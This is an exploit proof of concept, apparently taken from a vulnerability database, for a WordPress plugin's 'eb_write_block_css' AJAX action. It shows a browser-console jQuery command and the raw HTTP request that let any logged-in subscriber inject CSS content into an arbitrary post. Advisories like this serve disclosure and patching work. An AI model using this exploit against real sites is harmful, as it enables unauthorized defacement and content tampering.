## https://sploitus.com/exploit?id=WPEX-ID:431901EB-0F95-4033-B943-324E6D3844A5
Login as any user, such as a subscriber, and execute the below command via the Web Developer console (replacing the POST_ID by the post id to add the content to)
jQuery.post(ajaxurl,{action:"eb_write_block_css",id:POST_ID,data:JSON.stringify([{desktop:"p:before{content:'This content was added by a subscriber!';}"}])})
Which will send the following request:
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 143
Connection: close
Cookie: [any authenticated user]
action=eb_write_block_css&id=1422&data=%5B%7B%22desktop%22%3A%22p%3Abefore%7Bcontent%3A'This+content+was+added+by+a+subscriber!'%3B%7D%22%7D%5D
Then view the related post, which will have the text 'This content was added by a subscriber!' appended before each paragraph